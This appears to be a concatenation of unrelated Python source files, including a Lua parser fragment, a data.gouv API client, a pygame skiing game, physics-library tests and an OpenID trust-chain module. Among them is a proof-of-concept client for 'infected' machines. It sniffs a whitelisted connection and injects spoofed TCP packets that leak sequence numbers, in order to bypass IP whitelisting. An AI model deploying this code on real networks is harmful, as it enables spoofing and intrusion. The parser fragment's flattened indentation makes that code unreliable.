        """Finish 'varlist = explist' given the first, already-parsed var.

        Remaining vars are validated with check_var; *first_var* is trusted
        as the caller already parsed it as a prefixexp.
        """
        var_list = [first_var]
        while self.lex.look_ahead().kind == lexer.TokenKind.SEP_COMMA:
            self.lex.next_token()
            var_list.append(self.check_var(self.parse_prefix_exp()))
        self.lex.next_token_of_kind(lexer.TokenKind.OP_ASSIGN)
        exp_list = self.parse_exp_list()
        return ast.AssignStat(var_list, exp_list)
"""
stat ::= ‘;’ |
break |
::Name:: |
goto Name |
do block end |
while exp do block end |
repeat block until exp |
if exp then block {elseif exp then block} [else block] end |
for Name ‘=’ exp ‘,’ exp [‘,’ exp] do block end |
for namelist in explist do block end |
function funcname funcbody |
local function Name funcbody |
local namelist [‘=’ explist]
varlist ‘=’ explist |
functioncall
"""
def parse_stat(self):
token = self.lex.look_ahead()
if token.kind == lexer.TokenKind.SEP_SEMI:
return self.parse_empty_stat()
elif token.kind == lexer.TokenKind.KW_BREAK:
return self.parse_break_stat()
elif token.kind == lexer.TokenKind.SEP_LABEL:
return self.parse_label_stat()
elif token.kind == lexer.TokenKind.KW_GOTO:
return self.parse_goto_stat()
elif token.kind == lexer.TokenKind.KW_DO:
return self.parse_do_stat()
elif token.kind == lexer.TokenKind.KW_WHILE:
return self.parse_while_stat()
elif token.kind == lexer.TokenKind.KW_REPEAT:
return self.parse_repeat_stat()
elif token.kind == lexer.TokenKind.KW_IF:
return self.parse_if_stat()
elif token.kind == lexer.TokenKind.KW_FOR:
return self.parse_for_stat()
elif token.kind == lexer.TokenKind.KW_FUNCTION:
return self.parse_func_def_stat()
elif token.kind == lexer.TokenKind.KW_LOCAL:
return self.parse_local_def_stat()
else:
return self.parse_assign_or_func_call_stat()
    def parse_empty_stat(self):
        """Consume a lone ';'. Returns None; parse_stats drops None stats."""
        self.lex.next_token_of_kind(lexer.TokenKind.SEP_SEMI)
    def parse_break_stat(self):
        """Parse a 'break' statement."""
        self.lex.next_token_of_kind(lexer.TokenKind.KW_BREAK)
        return ast.BreakStat()
    def parse_label_stat(self):
        """Parse a label: '::' Name '::' (SEP_LABEL is the '::' token)."""
        self.lex.next_token_of_kind(lexer.TokenKind.SEP_LABEL)
        label = self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER)
        self.lex.next_token_of_kind(lexer.TokenKind.SEP_LABEL)
        return ast.LabelStat(label)
    def parse_stats(self):
        """Parse statements until a block-terminating token is seen.

        Empty statements (';') return None and are filtered out here.
        """
        stats = []
        while not self.is_block_end(self.lex.look_ahead().kind):
            stat = self.parse_stat()
            if stat:
                stats.append(stat)
        return stats
def is_block_end(self, kind):
if kind in self.block_end_tokens:
return True
return False | StarcoderdataPython |
1783604 | <filename>gtfs_converter/datagouv.py
import os
import requests
import logging
# Configuration pulled from the environment; the first three are required
# (a missing variable raises KeyError at import time).
DATAGOUV_API = os.environ["DATAGOUV_API"]
TRANSPORT_ORGANIZATION_ID = os.environ["TRANSPORT_ORGANIZATION_ID"]
DATAGOUV_API_KEY = os.environ["DATAGOUV_API_KEY"]
# Extras key used on data.gouv resources to point at the original file.
ORIGINAL_URL_KEY = "transport:original_resource_url"
def delete_community_resources(dataset_id, resources_id):
    """
    Delete a community resource on data.gouv.

    A 404 response is tolerated (the resource was already deleted);
    any other HTTP error is raised.
    """
    headers = {"X-API-KEY": DATAGOUV_API_KEY}
    url = f"{DATAGOUV_API}/datasets/community_resources/{resources_id}"
    logging.info(
        "deleting a community resource %s on dataset %s", resources_id, dataset_id
    )
    ret = requests.delete(url, params={"dataset": dataset_id}, headers=headers)
    if ret.status_code == 404:
        # it's ok if the resource has already been deleted
        return
    ret.raise_for_status()
def get_dataset_detail(dataset_id):
    """Fetch and return the full dataset description from the data.gouv API."""
    response = requests.get(f"{DATAGOUV_API}/datasets/{dataset_id}/")
    response.raise_for_status()
    return response.json()
def get_transport_community_resources(dataset_id):
    """
    Get all community resources for a dataset, filtered to those owned by
    the transport organization. Returns the API's ``data`` list.
    """
    url = f"{DATAGOUV_API}/datasets/community_resources/"
    ret = requests.get(
        url, params={"dataset": dataset_id, "organization": TRANSPORT_ORGANIZATION_ID}
    )
    ret.raise_for_status()
    data = ret.json()["data"]
    return data
def create_community_resource(dataset_id, cr_file):
    """
    Create a community resource on *dataset_id* and upload *cr_file*.

    This call does not link the resource to the dataset; that requires a
    separate call. Returns the parsed JSON of the new resource.
    """
    logging.debug("Creating a community resource on dataset %s", dataset_id)
    headers = {"X-API-KEY": DATAGOUV_API_KEY}
    url = f"{DATAGOUV_API}/datasets/{dataset_id}/upload/community/"
    # Fix: open the upload inside a context manager so the file handle is
    # closed deterministically (the original leaked it to the GC).
    with open(cr_file, "rb") as upload:
        ret = requests.post(url, headers=headers, files={"file": upload})
    ret.raise_for_status()
    json = ret.json()
    logging.debug(
        "Created a new community resource %s on dataset %s", json["id"], dataset_id
    )
    return json
def update_resource(dataset_id, resource_id, new_file, metadata):
    """
    Upload *new_file* to an existing data.gouv resource, then set the
    resource's *metadata* via a second PUT call.
    """
    logging.debug("Updating a resource on dataset %s", dataset_id)
    url = f"{DATAGOUV_API}/datasets/{dataset_id}/resources/{resource_id}/upload/"
    headers = {"X-API-KEY": DATAGOUV_API_KEY}
    # Fix: open the upload inside a context manager so the file handle is
    # closed deterministically (the original leaked it to the GC).
    with open(new_file, "rb") as upload:
        ret = requests.post(url, headers=headers, files={"file": upload})
    ret.raise_for_status()
    updated_resource_json = ret.json()
    # after the upload, we set the resource metadata
    new_resource = {**metadata, "id": resource_id}
    logging.debug("Updating metadata of resource %s", resource_id)
    url = f"{DATAGOUV_API}/datasets/{dataset_id}/resources/{resource_id}/"
    ret = requests.put(url, headers=headers, json=new_resource)
    ret.raise_for_status()
    logging.debug("Updating of resource %s done", resource_id)
| StarcoderdataPython |
import requests

# Demo of the JSONPlaceholder fake REST API: fetch one todo, then delete
# it and show the (empty) response body and status code.
# Fix: the last line carried stray non-Python residue that broke parsing.
api_url = "https://jsonplaceholder.typicode.com/todos/10"
response = requests.get(api_url)
print(response.json())

response = requests.delete(api_url)
print(response.json())
print(response.status_code)
3268507 | <gh_stars>1-10
#
# @lc app=leetcode id=20 lang=python3
#
# [20] Valid Parentheses
#
# https://leetcode.com/problems/valid-parentheses/description/
#
# algorithms
# Easy (39.76%)
# Likes: 6909
# Dislikes: 286
# Total Accepted: 1.3M
# Total Submissions: 3.3M
# Testcase Example: '"()"'
#
# Given a string s containing just the characters '(', ')', '{', '}', '[' and
# ']', determine if the input string is valid.
#
# An input string is valid if:
#
#
# Open brackets must be closed by the same type of brackets.
# Open brackets must be closed in the correct order.
#
#
#
# Example 1:
#
#
# Input: s = "()"
# Output: true
#
#
# Example 2:
#
#
# Input: s = "()[]{}"
# Output: true
#
#
# Example 3:
#
#
# Input: s = "(]"
# Output: false
#
#
# Example 4:
#
#
# Input: s = "([)]"
# Output: false
#
#
# Example 5:
#
#
# Input: s = "{[]}"
# Output: true
#
#
#
# Constraints:
#
#
# 1 <= s.length <= 10^4
# s consists of parentheses only '()[]{}'.
#
#
#
# @lc code=start
class Solution:
    def isValid(self, s: str) -> bool:
        """Return True if every bracket in *s* is closed by the matching
        bracket type in the correct order (LeetCode 20).

        Uses a stack of open brackets and a closer->opener map so each
        character is handled with one dict lookup instead of a three-way
        boolean chain. The empty string is valid (empty stack at the end).
        """
        pairs = {')': '(', ']': '[', '}': '{'}
        stack = []
        for ch in s:
            if ch in pairs:
                # Closer: the most recent open bracket must match.
                if not stack or stack[-1] != pairs[ch]:
                    return False
                stack.pop()
            else:
                stack.append(ch)
        # Valid only if every opener was closed.
        return not stack
# @lc code=end
| StarcoderdataPython |
128036 | <reponame>zhaokai0402/PyQt5-Study<gh_stars>0
import math

# -*- coding:utf-8 -*-
if __name__ == '__main__':
    # Read a length and print the derived square area, cube volume,
    # circle area and sphere volume.
    length = float(input("length: "))
    print("squares:", length ** 2)
    print("cubes:", length ** 3)
    print("circles:", math.pi * length ** 2)
    # Fix: this line computes the volume of a sphere but was labelled
    # "squares:"; it also carried stray non-Python residue at line end.
    print("spheres:", 4.0 / 3.0 * length ** 3 * math.pi)
163574 | <reponame>parkerwray/smuthi-1
# -*- coding: utf-8 -*-
"""Test spherical_functions"""
import smuthi.utility.math
import numpy as np
from sympy.physics.quantum.spin import Rotation
def test_wignerd():
    """Compare smuthi's Wigner d function against sympy's Rotation.d."""
    l_test = 5
    m_test = -3
    m_prime_test = 4
    beta_test = 0.64
    wigd = smuthi.utility.math.wigner_d(l_test, m_test, m_prime_test, beta_test, wdsympy=False)
    wigd_sympy = complex(Rotation.d(l_test, m_test, m_prime_test, beta_test).doit()).real
    # relative error against the sympy reference value
    err = abs((wigd - wigd_sympy) / wigd)
    assert err < 1e-10
def test_Plm_against_prototype():
    """Check normalized Legendre functions P, pi and tau against
    reference values (hard-coded from a prototype implementation)."""
    lmax = 3
    omega = 2 * 3.14 / 550
    # in-plane wavenumbers spanning propagating, grazing and evanescent waves
    kp = omega * np.array([0.01, 0.2, 0.7, 0.99, 1.2, 2 - 0.5j])
    kz = np.sqrt(omega ** 2 - kp ** 2 + 0j)
    kz[kz.imag < 0] = -kz[kz.imag < 0]
    ct = kz / omega
    st = kp / omega
    plm, pilm, taulm = smuthi.utility.math.legendre_normalized(ct, st, lmax)
    # P_3^0
    np.testing.assert_almost_equal(plm[3][0][0], 1.870267465826245)
    np.testing.assert_almost_equal(plm[3][0][1], 1.649727250184103)
    np.testing.assert_almost_equal(plm[3][0][2], -0.300608757357466)
    np.testing.assert_almost_equal(plm[3][0][3], -0.382739631607606)
    np.testing.assert_almost_equal(plm[3][0][4], - 3.226515147957620j)
    np.testing.assert_almost_equal(plm[3][0][5], -25.338383323084539 - 22.141864985871653j)
    # P_2^1
    np.testing.assert_almost_equal(plm[2][1][0], 0.019363948460993)
    np.testing.assert_almost_equal(plm[2][1][1], 0.379473319220206)
    np.testing.assert_almost_equal(plm[2][1][2], 0.968052168015753)
    np.testing.assert_almost_equal(plm[2][1][3], 0.270444009917026)
    np.testing.assert_almost_equal(plm[2][1][4], 1.541427909439815j)
    np.testing.assert_almost_equal(plm[2][1][5], 3.906499971729346 + 6.239600710712296j)
    # pi_2^1
    np.testing.assert_almost_equal(pilm[2][1][0], 1.936394846099318)
    np.testing.assert_almost_equal(pilm[2][1][1], 1.897366596101028)
    np.testing.assert_almost_equal(pilm[2][1][2], 1.382931668593933)
    np.testing.assert_almost_equal(pilm[2][1][3], 0.273175767592955)
    np.testing.assert_almost_equal(pilm[2][1][4], 1.284523257866512j)
    np.testing.assert_almost_equal(pilm[2][1][5], 1.104282256024128 + 3.395870919362181j)
    # tau_3^2
    np.testing.assert_almost_equal(taulm[3][2][0], 0.051227068616724)
    np.testing.assert_almost_equal(taulm[3][2][1], 0.963213372000203)
    np.testing.assert_almost_equal(taulm[3][2][2], 0.950404683542753)
    np.testing.assert_almost_equal(taulm[3][2][3], -2.384713931794872)
    np.testing.assert_almost_equal(taulm[3][2][4], -7.131877733107878)
    np.testing.assert_almost_equal(taulm[3][2][5], -39.706934218093430 + 42.588889121019569j)
np.testing.assert_almost_equal(taulm[3][2][5], -39.706934218093430 + 42.588889121019569j)
def test_jn_against_prototype():
    """Check spherical Bessel j_n against hard-coded reference values,
    including complex arguments."""
    n = 4
    z = np.array([0.01, 2, 5, 2+0.1j, 3-0.2j, 20+20j])
    jnz = smuthi.utility.math.spherical_bessel(n, z)
    np.testing.assert_almost_equal(jnz[0], 1.058196248205502e-11)
    np.testing.assert_almost_equal(jnz[1], 0.014079392762915)
    np.testing.assert_almost_equal(jnz[2], 0.187017655344890)
    np.testing.assert_almost_equal(jnz[3], 0.013925330885893 + 0.002550081632129j)
    np.testing.assert_almost_equal(jnz[4], 0.055554281414152 - 0.011718427699962j)
    np.testing.assert_almost_equal(jnz[5], 5.430299683226971e+06 - 3.884383001639664e+06j)
def test_hn_against_prototype():
    """Check spherical Hankel h_n against hard-coded reference values."""
    n = 4
    z = np.array([0.01, 2, 5, 2+0.1j, 3-0.2j, 20+20j])
    hnz = smuthi.utility.math.spherical_hankel(n, z)
    # np.testing.assert_almost_equal(hnz[0], 9.562028025173189e-05 - 1.050007500037500e+12j) this test fails - protype incorrect?
    np.testing.assert_almost_equal(hnz[1], 0.014079392762917 - 4.461291526363127j)
    np.testing.assert_almost_equal(hnz[2], 0.187017655344889 - 0.186615531479296j)
    np.testing.assert_almost_equal(hnz[3], -0.937540374646528 - 4.322684701489512j)
    np.testing.assert_almost_equal(hnz[4], 0.254757423766403 - 0.894658828739464j)
    np.testing.assert_almost_equal(hnz[5], 5.349924210583894e-11 - 7.680177127921456e-11j)
def test_dxxj_against_prototype():
    """Check d/dx[x*j_n(x)] against hard-coded reference values."""
    n = 4
    z = np.array([0.01, 2, 5, 2+0.1j, 3-0.2j, 20+20j])
    dxxj = smuthi.utility.math.dx_xj(n, z)
    np.testing.assert_almost_equal(dxxj[0], 5.290971621054867e-11)
    np.testing.assert_almost_equal(dxxj[1], 0.065126624274088)
    np.testing.assert_almost_equal(dxxj[2], 0.401032469441925)
    np.testing.assert_almost_equal(dxxj[3], 0.064527362367182 + 0.011261758715092j)
    np.testing.assert_almost_equal(dxxj[4], 0.230875079050277 - 0.041423344864749j)
    np.testing.assert_almost_equal(dxxj[5], 3.329872586039824e+07 - 1.858505295737451e+08j)
np.testing.assert_almost_equal(dxxj[5], 3.329872586039824e+07 - 1.858505295737451e+08j)
def test_dxxh_against_prototype():
    """Check d/dx[x*h_n(x)] against hard-coded reference values."""
    n = 4
    z = np.array([0.01, 2, 5, 2+0.1j, 3-0.2j, 20+20j])
    dxxh = smuthi.utility.math.dx_xh(n, z)
    #np.testing.assert_almost_equal(dxxh[0], -3.824801872151283e-04 + 4.200015000000000e+12j)
    np.testing.assert_almost_equal(dxxh[1], 0.065126624274084 +14.876432990566345j)
    np.testing.assert_almost_equal(dxxh[2], 0.401032469441923 + 0.669247576352214j)
    np.testing.assert_almost_equal(dxxh[3], 3.574345443512018 +14.372976166070977j)
    np.testing.assert_almost_equal(dxxh[4], -0.423459406818455 + 1.976243655979050j)
    np.testing.assert_almost_equal(dxxh[5], 4.344741738782320e-10 + 2.612636745427169e-09j)
def test_dxxj_against_j():
    """Check d/dx[x*j_n(x)] against a central finite difference of j_n."""
    n = 3
    eps = 1e-8
    z0 = 0.5
    # evaluate at z0 and at z0 +/- eps for the finite difference
    z = np.array([z0, z0 + eps, z0 - eps])
    jn = smuthi.utility.math.spherical_bessel(n, z)
    dxxj = smuthi.utility.math.dx_xj(n, z)
    d1 = dxxj[0]
    d2 = ((z0 + eps) * jn[1] - (z0 - eps) * jn[2]) / 2 / eps
    np.testing.assert_almost_equal(d1, d2)
def test_dxxh_against_h():
    """Check d/dx[x*h_n(x)] against a central finite difference of h_n."""
    n = 3
    eps = 1e-10
    z0 = 0.5
    # evaluate at z0 and at z0 +/- eps for the finite difference
    z = np.array([z0, z0 + eps, z0 - eps])
    hn = smuthi.utility.math.spherical_hankel(n, z)
    dxxh = smuthi.utility.math.dx_xh(n, z)
    d1 = dxxh[0]
    d2 = ((z0 + eps) * hn[1] - (z0 - eps) * hn[2]) / 2 / eps
    # Bug fix: the original asserted (d1 - d2) / d1 < 1e-5, which passes
    # trivially whenever the signed error is negative; compare magnitudes.
    assert abs(d1 - d2) / abs(d1) < 1e-5
if __name__ == '__main__':
    # Run every check in this module when executed directly
    # (no test runner required).
    test_wignerd()
    test_dxxh_against_h()
    test_dxxh_against_prototype()
    test_dxxj_against_j()
    test_dxxj_against_prototype()
    test_hn_against_prototype()
    test_jn_against_prototype()
    test_Plm_against_prototype()
| StarcoderdataPython |
13784 | import logging
from django.utils import timezone
from typing import Union
from .exceptions import InvalidTrustchain, TrustchainMissingMetadata
from .models import FetchedEntityStatement, TrustChain
from .statements import EntityConfiguration, get_entity_configurations
from .settings import HTTPC_PARAMS
from .trust_chain import TrustChainBuilder
from .utils import datetime_from_timestamp
logger = logging.getLogger(__name__)
def trust_chain_builder(
    subject: str,
    trust_anchor: EntityConfiguration,
    httpc_params: dict = HTTPC_PARAMS,
    required_trust_marks: list = []
) -> Union[TrustChainBuilder, bool]:
    """
    Build and validate the trust chain for *subject* up to *trust_anchor*.

    Returns the TrustChainBuilder on success, or False (with an error
    logged) when the tree of trust does not validate.

    NOTE(review): the mutable default for required_trust_marks is safe
    only because the list is never mutated here or by TrustChainBuilder --
    confirm before changing.
    """
    tc = TrustChainBuilder(
        subject,
        trust_anchor=trust_anchor,
        required_trust_marks=required_trust_marks,
        httpc_params=httpc_params
    )
    tc.start()
    if not tc.is_valid:
        logger.error(
            "The tree of trust cannot be validated for "
            f"{tc.subject}: {tc.tree_of_trust}"
        )
        return False
    else:
        return tc
def dumps_statements_from_trust_chain_to_db(trust_chain: TrustChainBuilder) -> list:
    """
    Persist every entity statement of *trust_chain* (and the verified
    descendant statements attached to each node) as FetchedEntityStatement
    rows, updating existing (sub, iss) rows in place.

    Returns the list of created/updated FetchedEntityStatement objects.
    """
    entity_statements = []
    for stat in trust_chain.trust_path:
        data = dict(
            exp=datetime_from_timestamp(stat.payload["exp"]),
            iat=datetime_from_timestamp(stat.payload["iat"]),
            statement=stat.payload,
            jwt=stat.jwt,
        )
        # upsert keyed on (sub, iss)
        fes = FetchedEntityStatement.objects.filter(sub=stat.sub, iss=stat.iss)
        if fes:
            fes.update(**data)
        else:
            fes = FetchedEntityStatement.objects.create(
                sub=stat.sub, iss=stat.iss, **data
            )
        entity_statements.append(fes)
        if stat.verified_descendant_statements:
            # statements this entity issued about its descendants
            for desc_stat_sub in stat.verified_descendant_statements:
                payload = stat.verified_descendant_statements[desc_stat_sub]
                jwt = stat.verified_descendant_statements_as_jwt[desc_stat_sub]
                _data = dict(
                    exp=datetime_from_timestamp(payload["exp"]),
                    iat=datetime_from_timestamp(payload["iat"]),
                    statement=payload,
                    jwt=jwt,
                )
                desc_fes = FetchedEntityStatement.objects.filter(
                    sub=payload["sub"], iss=payload["iss"]
                )
                if desc_fes:
                    desc_fes.update(**_data)
                else:
                    desc_fes = FetchedEntityStatement.objects.create(
                        sub=payload["sub"], iss=payload["iss"], **_data
                    )
                entity_statements.append(desc_fes)
    return entity_statements
def get_or_create_trust_chain(
    subject: str,
    trust_anchor: str,
    httpc_params: dict = HTTPC_PARAMS,
    required_trust_marks: list = [],
    force: bool = False,
) -> Union[TrustChain, None]:
    """
    returns a TrustChain model object if any available
    if available it return it
    if not available it create a new one
    if available and expired it return the expired one
    if flag force is set to True -> renew the trust chain, update it and
    return the updated one

    Returns None when a stored chain exists but was manually deactivated.
    Raises InvalidTrustchain / TrustchainMissingMetadata when a rebuild
    fails or produces no metadata.
    """
    # First make sure we have a fresh entity configuration for the anchor.
    fetched_trust_anchor = FetchedEntityStatement.objects.filter(
        sub=trust_anchor, iss=trust_anchor
    )
    if not fetched_trust_anchor or fetched_trust_anchor.first().is_expired or force:
        # (re)fetch the anchor's self-signed entity configuration
        jwts = get_entity_configurations([trust_anchor], httpc_params=httpc_params)
        ta_conf = EntityConfiguration(jwts[0], httpc_params=httpc_params)
        data = dict(
            exp=datetime_from_timestamp(ta_conf.payload["exp"]),
            iat=datetime_from_timestamp(ta_conf.payload["iat"]),
            statement=ta_conf.payload,
            jwt=ta_conf.jwt,
        )
        if not fetched_trust_anchor:
            # trust to the anchor should be absolute trusted!
            # ta_conf.validate_by_itself()
            fetched_trust_anchor = FetchedEntityStatement.objects.create(
                sub=ta_conf.sub, iss=ta_conf.iss, **data
            )
        else:
            fetched_trust_anchor.update(
                exp=datetime_from_timestamp(ta_conf.payload["exp"]),
                iat=datetime_from_timestamp(ta_conf.payload["iat"]),
                statement=ta_conf.payload,
                jwt=ta_conf.jwt,
            )
            fetched_trust_anchor = fetched_trust_anchor.first()
    else:
        fetched_trust_anchor = fetched_trust_anchor.first()
        ta_conf = fetched_trust_anchor.get_entity_configuration_as_obj()
    tc = TrustChain.objects.filter(sub=subject, trust_anchor__sub=trust_anchor).first()
    if tc and not tc.is_active:
        # if manualy disabled by staff
        return None
    elif force or not tc or tc.is_expired:
        # (re)build the chain from scratch and persist its statements
        trust_chain = trust_chain_builder(
            subject=subject,
            trust_anchor=ta_conf,
            required_trust_marks=required_trust_marks
        )
        if not trust_chain:
            raise InvalidTrustchain(
                f"Trust chain for subject {subject} and "
                f"trust_anchor {trust_anchor} is not found"
            )
        elif not trust_chain.is_valid:
            raise InvalidTrustchain(
                f"Trust chain for subject {subject} and "
                f"trust_anchor {trust_anchor} is not valid"
            )
        elif not trust_chain.final_metadata:
            raise TrustchainMissingMetadata(
                f"Trust chain for subject {subject} and "
                f"trust_anchor {trust_anchor} doesn't have any metadata"
            )
        dumps_statements_from_trust_chain_to_db(trust_chain)
        tc = TrustChain.objects.filter(
            sub=subject, trust_anchor__sub=trust_anchor
        )
        data = dict(
            exp=trust_chain.exp_datetime,
            processing_start = timezone.localtime(),
            chain=trust_chain.serialize(),
            metadata=trust_chain.final_metadata,
            parties_involved=[i.sub for i in trust_chain.trust_path],
            status="valid",
            trust_marks=[
                {"id": i.id, "trust_mark": i.jwt}
                for i in trust_chain.verified_trust_marks
            ],
            is_active=True,
        )
        if tc:
            tc.update(**data)
            tc = tc.first()
        else:
            tc = TrustChain.objects.create(
                sub=subject,
                trust_anchor=fetched_trust_anchor,
                **data,
            )
    return tc
| StarcoderdataPython |
1770832 | #!/usr/bin/python
import pygame, sys, random
# Sprite filenames indexed by skier.angle (0 = straight down, 1..2 lean
# right); negative angles (-1, -2) wrap around to the left-facing images.
skier_images=["skier_down.png", "skier_right1.png", "skier_right2.png", "skier_left2.png", "skier_left1.png"]
class SkierClass(pygame.sprite.Sprite):
    """The player's skier sprite: tracks its lean angle and position."""
    def __init__(self):
        pygame.sprite.Sprite.__init__(self)
        self.image = pygame.image.load("skier_down.png")
        self.rect = self.image.get_rect()
        self.rect.center = [320, 100]
        # lean angle, clamped to [-2, 2]; indexes into skier_images
        self.angle = 0
    def turn(self, direction):
        """Adjust the lean by *direction*, swap the sprite image, and
        return the new [dx, dy] speed (steeper lean = slower descent)."""
        self.angle = self.angle + direction
        if self.angle < -2:
            self.angle = -2
        if self.angle > 2:
            self.angle = 2
        # keep the sprite centred while swapping images
        center = self.rect.center
        self.image = pygame.image.load(skier_images[self.angle]) # you missed a ")" here
        self.rect = self.image.get_rect()
        self.rect.center = center
        speed = [self.angle, 6 - abs(self.angle)*2]
        return speed
    def move(self, speed):
        """Shift horizontally by speed[0], clamped to the 640px window."""
        self.rect.centerx=self.rect.centerx+speed[0]
        if self.rect.centerx < 20: self.rect.centerx = 20
        if self.rect.centerx > 620: self.rect.centerx = 620
class ObstacleClass(pygame.sprite.Sprite):
    """A tree or flag scrolling up the screen toward the skier."""
    def __init__(self, image_file, location, type): # typo of location, you input lacation
        pygame.sprite.Sprite.__init__(self)
        self.image_file = image_file
        self.image = pygame.image.load(image_file)
        self.rect = self.image.get_rect()
        self.rect.center = location
        # "tree" or "flag"
        self.type = type
        # set once the skier has collided with this obstacle
        self.passed = False
    def update(self):
        """Scroll upward by the global descent speed; despawn off-screen."""
        global speed
        self.rect.centery -= speed[1]
        if self.rect.centery < -32:
            self.kill()
def create_map():
    """Spawn up to 10 obstacles on a 10x10 grid one screen below the view.

    Duplicate grid cells are skipped, so fewer than 10 may appear.
    """
    global obstacles
    locations = []
    for i in range(10):
        row = random.randint(0, 9)
        col = random.randint(0, 9)
        # +640 places the obstacle one full screen below the visible area
        location  = [col * 64+20, row*64 + 20 + 640]
        if not (location in locations): # typo of location, you input lacation
            locations.append(location)
            type = random.choice(["tree", "flag"])
            if type == "tree":
                img = "skier_tree.png"
            elif type == "flag":
                img = "skier_flag.png"
            obstacle = ObstacleClass(img, location, type)
            obstacles.add(obstacle) #typo of obstacles, you input obstacle
def animate():
    """Redraw the frame: background, obstacles, skier and score."""
    screen.fill([255, 255, 255])
    obstacles.draw(screen)
    screen.blit(skier.image, skier.rect)
    screen.blit(score_text, [10, 10]) # missed the closing ")" again
    pygame.display.flip()
# --- game setup ---
pygame.init()
screen = pygame.display.set_mode([640, 640])
clock = pygame.time.Clock()
skier = SkierClass()
speed = [0, 6]
obstacles = pygame.sprite.Group()
map_position = 0
points = 0
create_map()
font = pygame.font.Font(None, 50)

# --- main loop: handle input, scroll the map, resolve collisions ---
running = True
while running:
    clock.tick(30)
    for event in pygame.event.get():
        if event.type == pygame.QUIT: # typo of QUIT, you input QIUT
            running = False
        if event.type == pygame.KEYDOWN:
            if event.key == pygame.K_RIGHT:
                speed = skier.turn(-1)
            # Bug fix: the original tested K_RIGHT in both branches,
            # making this branch unreachable and left turns impossible.
            elif event.key == pygame.K_LEFT:
                speed = skier.turn(1)
    skier.move(speed)
    map_position += speed[1]
    # spawn a fresh batch of obstacles each time a screen-height scrolls by
    if map_position >=640: # missed the ":" here
        create_map()
        map_position = 0
    hit = pygame.sprite.spritecollide(skier, obstacles, False)
    if hit:
        if hit[0].type == "tree" and not hit [0].passed:
            # crash: lose points, reset pose and speed
            points = points - 100
            skier.image = pygame.image.load("skier_crash.png")
            skier.angle = 0
            speed = [0, 6]
            hit[0].passed = True
        elif hit[0].type == "flag" and not hit[0].passed:
            points += 10
            hit[0].kill()
    obstacles.update()
    score_text = font.render("Score: " +str(points), 1, (0, 0, 0)) # missed the closing ")"
    # typo of score in above line, you input acore
    animate()
pygame.quit()
| StarcoderdataPython |
101364 | #!/usr/bin/env python
"""
DiabloHorn - https://diablohorn.com
POC client on 'infected' machines to receive injected packets
intended to bypass IP whitelisting
"""
import sys
import time
import socket
from threading import Thread
from Queue import Queue, Empty
from scapy.all import *
conf.sniff_promisc = 0
#References
# http://stackoverflow.com/questions/16279661/scapy-fails-to-sniff-packets-when-using-multiple-threads?rq=1
class ControlConnection:
    """TCP connection to a whitelisted host, paired with a scapy sniffer
    so the raw packets of that connection can be inspected."""
    def __init__(self, host,dport):
        self.host = host
        self.dport = dport
        # set True once the background sniffer thread is running
        self.snifferstarted = False
    def setup_cc(self):
        """Start the background sniffer thread feeding a packet queue."""
        self.q = Queue()
        sniffert = Thread(target = self.__sniffer, args = (self.q,self.host))
        sniffert.daemon = True
        sniffert.start()
        self.snifferstarted = True
    def __sniffer(self, q, targetip,sniface='eth0'):
        # NOTE(review): interface hard-coded to eth0 by default.
        sniff(iface=sniface,store=0,prn=lambda x : q.put(x),filter="ip and host {}".format(targetip))
    def connect(self):
        """Open the TCP socket; only valid after setup_cc()."""
        if self.snifferstarted:
            self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self.s.connect((self.host, self.dport))
    def keepalive(self,data='exfil'):
        """Send filler data to keep the connection alive."""
        self.s.sendall(data)
    def leaknum(self):
        """Return the next sniffed packet, or None after a 1s timeout."""
        pkt = None
        try:
            pkt = self.q.get(timeout=1)
        except Empty:
            pass
        return pkt
    def getdata(self):
        """Read and print two short chunks from the socket (5s timeout)."""
        self.s.settimeout(5)
        print self.s.recv(6)
        print self.s.recv(4)
    def close(self):
        self.s.close()
def leaknums(leakednum, leakedport,
             src="172.16.218.156", dst="172.16.218.152", dport=8080):
    """Inject one crafted TCP packet carrying *leakednum* as its sequence number.

    The previously hard-coded addresses/port are now keyword parameters whose
    defaults preserve the original behavior (backward compatible).

    leakednum  -- value to place in the TCP sequence-number field
    leakedport -- TCP source port to stamp on the packet
    src/dst    -- spoofed source IP / destination IP
    dport      -- destination TCP port
    """
    pkt = IP(src=src, dst=dst) / TCP(dport=dport, sport=leakedport, seq=leakednum)
    send(pkt)
if __name__ == "__main__":
    # CLI entry point: <whitelisted ip> <port> (Python 2 script).
    if len(sys.argv) != 3:
        print "{} <whitelisted ip> <port>".format(sys.argv[0])
        sys.exit()
    whitelistedip = sys.argv[1]
    portnum = int(sys.argv[2])
    # Bring up the sniffer first so the TCP handshake is captured.
    cc = ControlConnection(whitelistedip,portnum)
    cc.setup_cc()
    time.sleep(2)
    cc.connect()
    while True:
        pkt = cc.leaknum()
        print repr(pkt)
        if pkt:
            tcpdata = pkt.getlayer(TCP)
            #SA flags set
            # NOTE(review): flags == 16 is the ACK bit alone, not SYN+ACK
            # (SA would be 18) -- confirm which packet is intended here.
            if tcpdata.flags == 16:
                print 'leaking'
                # Reflect the observed seq/ack numbers back via injection.
                leaknums(tcpdata.seq,tcpdata.sport)
                leaknums(tcpdata.ack,tcpdata.sport+1)
                try:
                    cc.getdata()
                except:
                    # best-effort read; ignore timeouts/disconnects
                    pass
    # NOTE(review): unreachable -- the while True above never breaks.
    cc.close()
| StarcoderdataPython |
1744402 | # -*- coding: utf-8 -*-
r"""
:mod:`ganground` -- Lightweight framework for common ML workflow
================================================================
.. module:: ganground
:platform: Unix
:synopsis: Flexible wrapper of PyTorch which organizes boilerplate code.
"""
from ganground._version import *
from ganground import data
from ganground.data import *
from ganground import nn
from ganground import optim
from ganground import metric
from ganground.metric import *
from ganground import measure
from ganground.measure import *
from ganground.random import PRNG
from ganground import logging
from ganground import tracking
from ganground.exp import Experiment
| StarcoderdataPython |
4801067 | #!/usr/bin/env python3
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
import argparse
import os
import numpy as np
import time
import sys
import signal
from conban_spanet.environment import Environment
from conban_spanet.conbanalg import *
from bite_selection_package.config import spanet_config as config
NUM_FEATURES = 2048 if config.n_features==None else config.n_features
envir = None
def signal_handler(sig, frame):
    """SIGINT handler: dump collected features to CSV, then exit cleanly.

    Reads the module-global ``envir`` (set in ``__main__``); if the
    environment was created, its feature matrix is saved before exiting.
    """
    print()
    print("Caught SIGINT")
    if envir is not None:
        print("Saving features to features.csv")
        np.savetxt("features.csv", envir.features, delimiter=",")
    print("Exiting...")
